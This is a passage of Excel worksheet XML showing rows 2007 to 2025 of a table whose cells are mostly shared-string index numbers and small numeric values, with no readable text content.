      <c r="V2007" s="12" t="s">
        <v>4704</v>
      </c>
      <c r="W2007" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2007" s="12">
        <v>5</v>
      </c>
      <c r="Y2007" s="12" t="s">
        <v>14446</v>
      </c>
    </row>
    <row r="2008" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2008" s="12">
        <v>10318</v>
      </c>
      <c r="B2008" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D2008" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E2008" s="12" t="s">
        <v>31469</v>
      </c>
      <c r="F2008" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2008" s="12" t="s">
        <v>14447</v>
      </c>
      <c r="H2008" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2008" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J2008" s="12" t="s">
        <v>139</v>
      </c>
      <c r="K2008" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2008" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2008" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2008" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2008" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2008" s="12" t="s">
        <v>14448</v>
      </c>
      <c r="Q2008" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R2008" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2008" s="12" t="s">
        <v>14449</v>
      </c>
      <c r="T2008" s="12" t="s">
        <v>5666</v>
      </c>
      <c r="U2008" s="12" t="s">
        <v>14450</v>
      </c>
      <c r="V2008" s="12" t="s">
        <v>995</v>
      </c>
      <c r="W2008" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2008" s="12">
        <v>9</v>
      </c>
      <c r="Y2008" s="12" t="s">
        <v>14451</v>
      </c>
    </row>
    <row r="2009" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2009" s="12">
        <v>10320</v>
      </c>
      <c r="B2009" s="12" t="s">
        <v>30682</v>
      </c>
      <c r="D2009" s="12" t="s">
        <v>30651</v>
      </c>
      <c r="F2009" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2009" s="12" t="s">
        <v>14452</v>
      </c>
      <c r="H2009" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2009" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J2009" s="12" t="s">
        <v>9315</v>
      </c>
      <c r="K2009" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2009" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2009" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2009" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2009" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2009" s="12" t="s">
        <v>14453</v>
      </c>
      <c r="Q2009" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R2009" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2009" s="12" t="s">
        <v>14454</v>
      </c>
      <c r="T2009" s="12" t="s">
        <v>12566</v>
      </c>
      <c r="U2009" s="12" t="s">
        <v>14455</v>
      </c>
      <c r="V2009" s="12" t="s">
        <v>10241</v>
      </c>
      <c r="W2009" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2009" s="12">
        <v>36</v>
      </c>
      <c r="Y2009" s="12" t="s">
        <v>14456</v>
      </c>
    </row>
    <row r="2010" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2010" s="12">
        <v>10323</v>
      </c>
      <c r="B2010" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D2010" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E2010" s="12" t="s">
        <v>31429</v>
      </c>
      <c r="F2010" s="12" t="s">
        <v>29768</v>
      </c>
      <c r="G2010" s="12" t="s">
        <v>14457</v>
      </c>
      <c r="H2010" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2010" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J2010" s="12" t="s">
        <v>139</v>
      </c>
      <c r="K2010" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2010" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2010" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2010" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2010" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2010" s="12" t="s">
        <v>14393</v>
      </c>
      <c r="Q2010" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R2010" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2010" s="12" t="s">
        <v>14458</v>
      </c>
      <c r="T2010" s="12" t="s">
        <v>14459</v>
      </c>
      <c r="U2010" s="12" t="s">
        <v>14460</v>
      </c>
      <c r="V2010" s="12" t="s">
        <v>995</v>
      </c>
      <c r="W2010" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2010" s="12">
        <v>7</v>
      </c>
      <c r="Y2010" s="12" t="s">
        <v>14461</v>
      </c>
    </row>
    <row r="2011" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2011" s="12">
        <v>10326</v>
      </c>
      <c r="B2011" s="12" t="s">
        <v>30520</v>
      </c>
      <c r="C2011" s="12" t="s">
        <v>30521</v>
      </c>
      <c r="D2011" s="12" t="s">
        <v>30522</v>
      </c>
      <c r="E2011" s="12" t="s">
        <v>31452</v>
      </c>
      <c r="F2011" s="12" t="s">
        <v>30505</v>
      </c>
      <c r="G2011" s="12" t="s">
        <v>14462</v>
      </c>
      <c r="H2011" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2011" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J2011" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K2011" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2011" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2011" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2011" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2011" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2011" s="12" t="s">
        <v>14463</v>
      </c>
      <c r="Q2011" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R2011" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2011" s="12" t="s">
        <v>14464</v>
      </c>
      <c r="T2011" s="12" t="s">
        <v>12566</v>
      </c>
      <c r="U2011" s="12" t="s">
        <v>14465</v>
      </c>
      <c r="V2011" s="12" t="s">
        <v>323</v>
      </c>
      <c r="W2011" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2011" s="12">
        <v>25</v>
      </c>
      <c r="Y2011" s="12" t="s">
        <v>14466</v>
      </c>
    </row>
    <row r="2012" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2012" s="12">
        <v>10337</v>
      </c>
      <c r="B2012" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2012" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2012" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F2012" s="12" t="s">
        <v>31272</v>
      </c>
      <c r="G2012" s="12" t="s">
        <v>14473</v>
      </c>
      <c r="H2012" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2012" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2012" s="12" t="s">
        <v>96</v>
      </c>
      <c r="K2012" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2012" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2012" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2012" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2012" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2012" s="12" t="s">
        <v>10414</v>
      </c>
      <c r="Q2012" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R2012" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2012" s="12" t="s">
        <v>14474</v>
      </c>
      <c r="T2012" s="12" t="s">
        <v>14475</v>
      </c>
      <c r="U2012" s="12" t="s">
        <v>14476</v>
      </c>
      <c r="V2012" s="12" t="s">
        <v>4746</v>
      </c>
      <c r="W2012" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2012" s="12">
        <v>22</v>
      </c>
      <c r="Y2012" s="12" t="s">
        <v>14477</v>
      </c>
    </row>
    <row r="2013" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2013" s="12">
        <v>10338</v>
      </c>
      <c r="B2013" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D2013" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F2013" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2013" s="12" t="s">
        <v>14478</v>
      </c>
      <c r="H2013" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2013" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2013" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K2013" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2013" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2013" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2013" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2013" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2013" s="12" t="s">
        <v>14479</v>
      </c>
      <c r="Q2013" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R2013" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2013" s="12" t="s">
        <v>14480</v>
      </c>
      <c r="T2013" s="12" t="s">
        <v>12894</v>
      </c>
      <c r="U2013" s="12" t="s">
        <v>14481</v>
      </c>
      <c r="V2013" s="12" t="s">
        <v>2476</v>
      </c>
      <c r="W2013" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2013" s="12">
        <v>1</v>
      </c>
      <c r="Y2013" s="12" t="s">
        <v>14482</v>
      </c>
    </row>
    <row r="2014" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2014" s="12">
        <v>10340</v>
      </c>
      <c r="B2014" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C2014" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D2014" s="12" t="s">
        <v>30913</v>
      </c>
      <c r="E2014" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F2014" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2014" s="12" t="s">
        <v>14483</v>
      </c>
      <c r="H2014" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2014" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J2014" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K2014" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2014" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2014" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2014" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2014" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2014" s="12" t="s">
        <v>14240</v>
      </c>
      <c r="Q2014" s="12">
        <v>2.5</v>
      </c>
      <c r="R2014" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2014" s="12" t="s">
        <v>14484</v>
      </c>
      <c r="T2014" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2014" s="12" t="s">
        <v>14485</v>
      </c>
      <c r="V2014" s="12" t="s">
        <v>4689</v>
      </c>
      <c r="W2014" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2014" s="12">
        <v>6</v>
      </c>
      <c r="Y2014" s="12" t="s">
        <v>14486</v>
      </c>
    </row>
    <row r="2015" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2015" s="12">
        <v>10343</v>
      </c>
      <c r="B2015" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C2015" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D2015" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2015" s="12" t="s">
        <v>31469</v>
      </c>
      <c r="F2015" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2015" s="12" t="s">
        <v>14487</v>
      </c>
      <c r="H2015" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2015" s="12" t="s">
        <v>27</v>
      </c>
      <c r="J2015" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K2015" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2015" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2015" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2015" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2015" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2015" s="12" t="s">
        <v>14393</v>
      </c>
      <c r="Q2015" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R2015" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2015" s="12" t="s">
        <v>14488</v>
      </c>
      <c r="T2015" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2015" s="12" t="s">
        <v>14489</v>
      </c>
      <c r="V2015" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W2015" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2015" s="12">
        <v>1</v>
      </c>
      <c r="Y2015" s="12" t="s">
        <v>14490</v>
      </c>
    </row>
    <row r="2016" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2016" s="12">
        <v>10345</v>
      </c>
      <c r="B2016" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C2016" s="12" t="s">
        <v>30919</v>
      </c>
      <c r="D2016" s="12" t="s">
        <v>30913</v>
      </c>
      <c r="E2016" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F2016" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2016" s="12" t="s">
        <v>14491</v>
      </c>
      <c r="H2016" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2016" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2016" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K2016" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2016" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2016" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2016" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2016" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2016" s="12" t="s">
        <v>14492</v>
      </c>
      <c r="Q2016" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R2016" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2016" s="12" t="s">
        <v>14493</v>
      </c>
      <c r="T2016" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2016" s="12" t="s">
        <v>14494</v>
      </c>
      <c r="V2016" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W2016" s="12">
        <v>10291</v>
      </c>
      <c r="X2016" s="12">
        <v>34</v>
      </c>
      <c r="Y2016" s="12" t="s">
        <v>14495</v>
      </c>
    </row>
    <row r="2017" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2017" s="12">
        <v>10364</v>
      </c>
      <c r="B2017" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2017" s="12" t="s">
        <v>30905</v>
      </c>
      <c r="F2017" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2017" s="12" t="s">
        <v>14496</v>
      </c>
      <c r="H2017" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2017" s="12" t="s">
        <v>5208</v>
      </c>
      <c r="J2017" s="12" t="s">
        <v>12983</v>
      </c>
      <c r="K2017" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2017" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2017" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2017" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2017" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2017" s="12" t="s">
        <v>14492</v>
      </c>
      <c r="Q2017" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R2017" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2017" s="12" t="s">
        <v>14497</v>
      </c>
      <c r="T2017" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2017" s="12" t="s">
        <v>14498</v>
      </c>
      <c r="V2017" s="12" t="s">
        <v>12987</v>
      </c>
      <c r="W2017" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2017" s="12">
        <v>7</v>
      </c>
      <c r="Y2017" s="12" t="s">
        <v>14499</v>
      </c>
    </row>
    <row r="2018" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2018" s="12">
        <v>10366</v>
      </c>
      <c r="B2018" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2018" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2018" s="12" t="s">
        <v>31425</v>
      </c>
      <c r="F2018" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2018" s="12" t="s">
        <v>14500</v>
      </c>
      <c r="H2018" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2018" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2018" s="12" t="s">
        <v>356</v>
      </c>
      <c r="K2018" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2018" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2018" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2018" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2018" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2018" s="12" t="s">
        <v>14492</v>
      </c>
      <c r="Q2018" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R2018" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2018" s="12" t="s">
        <v>14501</v>
      </c>
      <c r="T2018" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2018" s="12" t="s">
        <v>14502</v>
      </c>
      <c r="V2018" s="12" t="s">
        <v>8133</v>
      </c>
      <c r="W2018" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2018" s="12">
        <v>3</v>
      </c>
      <c r="Y2018" s="12" t="s">
        <v>14503</v>
      </c>
    </row>
    <row r="2019" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2019" s="12">
        <v>10368</v>
      </c>
      <c r="B2019" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D2019" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2019" s="12" t="s">
        <v>31511</v>
      </c>
      <c r="F2019" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2019" s="12" t="s">
        <v>14504</v>
      </c>
      <c r="H2019" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2019" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J2019" s="12" t="s">
        <v>166</v>
      </c>
      <c r="K2019" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2019" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2019" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2019" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2019" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2019" s="12" t="s">
        <v>14505</v>
      </c>
      <c r="Q2019" s="12" t="s">
        <v>28336</v>
      </c>
      <c r="R2019" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2019" s="12" t="s">
        <v>14506</v>
      </c>
      <c r="T2019" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2019" s="12" t="s">
        <v>14507</v>
      </c>
      <c r="V2019" s="12" t="s">
        <v>167</v>
      </c>
      <c r="W2019" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2019" s="12">
        <v>4</v>
      </c>
      <c r="Y2019" s="12" t="s">
        <v>14508</v>
      </c>
    </row>
    <row r="2020" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2020" s="12">
        <v>10369</v>
      </c>
      <c r="B2020" s="12" t="s">
        <v>30920</v>
      </c>
      <c r="C2020" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D2020" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2020" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F2020" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2020" s="12" t="s">
        <v>14509</v>
      </c>
      <c r="H2020" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2020" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J2020" s="12" t="s">
        <v>1724</v>
      </c>
      <c r="K2020" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2020" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2020" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2020" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2020" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2020" s="12" t="s">
        <v>14492</v>
      </c>
      <c r="Q2020" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R2020" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2020" s="12" t="s">
        <v>14510</v>
      </c>
      <c r="T2020" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2020" s="12" t="s">
        <v>14511</v>
      </c>
      <c r="V2020" s="12" t="s">
        <v>11875</v>
      </c>
      <c r="W2020" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2020" s="12">
        <v>32</v>
      </c>
      <c r="Y2020" s="12" t="s">
        <v>14512</v>
      </c>
    </row>
    <row r="2021" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2021" s="12">
        <v>10371</v>
      </c>
      <c r="B2021" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C2021" s="12" t="s">
        <v>28357</v>
      </c>
      <c r="D2021" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E2021" s="12" t="s">
        <v>31429</v>
      </c>
      <c r="F2021" s="12" t="s">
        <v>29768</v>
      </c>
      <c r="G2021" s="12" t="s">
        <v>28365</v>
      </c>
      <c r="H2021" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2021" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J2021" s="12" t="s">
        <v>139</v>
      </c>
      <c r="K2021" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2021" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2021" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2021" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2021" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2021" s="12" t="s">
        <v>10414</v>
      </c>
      <c r="Q2021" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R2021" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2021" s="12" t="s">
        <v>14513</v>
      </c>
      <c r="T2021" s="12" t="s">
        <v>14514</v>
      </c>
      <c r="U2021" s="12" t="s">
        <v>14515</v>
      </c>
      <c r="V2021" s="12" t="s">
        <v>995</v>
      </c>
      <c r="W2021" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2021" s="12">
        <v>5</v>
      </c>
      <c r="Y2021" s="12" t="s">
        <v>14516</v>
      </c>
    </row>
    <row r="2022" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2022" s="12">
        <v>10372</v>
      </c>
      <c r="B2022" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2022" s="12" t="s">
        <v>31366</v>
      </c>
      <c r="E2022" s="12" t="s">
        <v>31429</v>
      </c>
      <c r="F2022" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G2022" s="12" t="s">
        <v>14517</v>
      </c>
      <c r="H2022" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2022" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J2022" s="12" t="s">
        <v>9315</v>
      </c>
      <c r="K2022" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2022" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2022" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2022" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2022" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2022" s="12" t="s">
        <v>14471</v>
      </c>
      <c r="Q2022" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R2022" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2022" s="12" t="s">
        <v>14518</v>
      </c>
      <c r="T2022" s="12" t="s">
        <v>14519</v>
      </c>
      <c r="U2022" s="12" t="s">
        <v>14520</v>
      </c>
      <c r="V2022" s="12" t="s">
        <v>10241</v>
      </c>
      <c r="W2022" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2022" s="12">
        <v>2</v>
      </c>
      <c r="Y2022" s="12" t="s">
        <v>14521</v>
      </c>
    </row>
    <row r="2023" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2023" s="12">
        <v>10375</v>
      </c>
      <c r="B2023" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2023" s="12" t="s">
        <v>31209</v>
      </c>
      <c r="E2023" s="12" t="s">
        <v>31429</v>
      </c>
      <c r="F2023" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G2023" s="12" t="s">
        <v>14532</v>
      </c>
      <c r="H2023" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2023" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J2023" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K2023" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2023" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M2023" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N2023" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O2023" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2023" s="12" t="s">
        <v>14533</v>
      </c>
      <c r="Q2023" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R2023" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2023" s="12" t="s">
        <v>14534</v>
      </c>
      <c r="T2023" s="12" t="s">
        <v>14535</v>
      </c>
      <c r="U2023" s="12" t="s">
        <v>14536</v>
      </c>
      <c r="V2023" s="12" t="s">
        <v>323</v>
      </c>
      <c r="W2023" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2023" s="12">
        <v>6</v>
      </c>
      <c r="Y2023" s="12" t="s">
        <v>14537</v>
      </c>
    </row>
    <row r="2024" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2024" s="12">
        <v>10378</v>
      </c>
      <c r="B2024" s="12" t="s">
        <v>30520</v>
      </c>
      <c r="C2024" s="12" t="s">
        <v>30521</v>
      </c>
      <c r="D2024" s="12" t="s">
        <v>30522</v>
      </c>
      <c r="E2024" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F2024" s="12" t="s">
        <v>30517</v>
      </c>
      <c r="G2024" s="12" t="s">
        <v>14538</v>
      </c>
      <c r="H2024" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2024" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J2024" s="12" t="s">
        <v>258</v>
      </c>
      <c r="K2024" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2024" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M2024" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N2024" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O2024" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2024" s="12" t="s">
        <v>14539</v>
      </c>
      <c r="Q2024" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R2024" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2024" s="12" t="s">
        <v>14540</v>
      </c>
      <c r="T2024" s="12" t="s">
        <v>9554</v>
      </c>
      <c r="U2024" s="12" t="s">
        <v>14541</v>
      </c>
      <c r="V2024" s="12" t="s">
        <v>3984</v>
      </c>
      <c r="W2024" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2024" s="12">
        <v>6</v>
      </c>
      <c r="Y2024" s="12" t="s">
        <v>14542</v>
      </c>
    </row>
    <row r="2025" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2025" s="12">
        <v>10380</v>
      </c>
      <c r="B2025" s="12" t="s">
        <v>30682</v>
      </c>
      <c r="D2025" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E2025" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F2025" s="12" t="s">
        <v>30640</v>
      </c>
      <c r="G2025" s="12" t="s">
        <v>14543</v>
      </c>
      <c r="H2025" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2025" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2025" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K2025" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2025" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2025" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2025" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2025" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2025" s="12" t="s">
        <v>10414</v>
      </c>
      <c r="Q2025" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R2025" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2025" s="12" t="s">
        <v>14544</v>
      </c>
      <c r="T2025" s="12" t="s">
        <v>14545</v>
      </c>
      <c r="U2025" s="12" t="s">
